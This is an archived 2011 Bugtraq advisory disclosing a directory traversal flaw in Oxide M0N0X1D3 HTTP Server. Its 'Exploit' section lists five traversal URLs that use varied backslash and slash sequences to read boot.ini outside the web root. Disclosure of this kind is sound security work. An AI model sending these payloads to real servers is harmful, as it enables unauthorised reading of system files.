lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201111291116.pATBGGcV001825@sf01web1.securityfocus.com> Date: Tue, 29 Nov 2011 11:16:16 GMT From: demonalex@....com To: bugtraq@...urityfocus.com Subject: Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability Title : Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability Software : Oxide M0N0X1D3 HTTP Server Software Version : 20040223 Vendor: http://sourceforge.net/projects/oxide-ws/ Vulnerability Published : 2011-11-15 Vulnerability Update Time : Status : Impact : Medium Bug Description : Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser. Exploit : **************************************************************** http://target/..\..\..\boot.ini http://target/..\\..\\..\\boot.ini http://target/..\/..\/..\/boot.ini http://target//..\/..\/..\boot.ini http://target/.\..\.\..\.\..\boot.ini .. **************************************************************** Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/PolyU.HK
Powered by blists - more mailing lists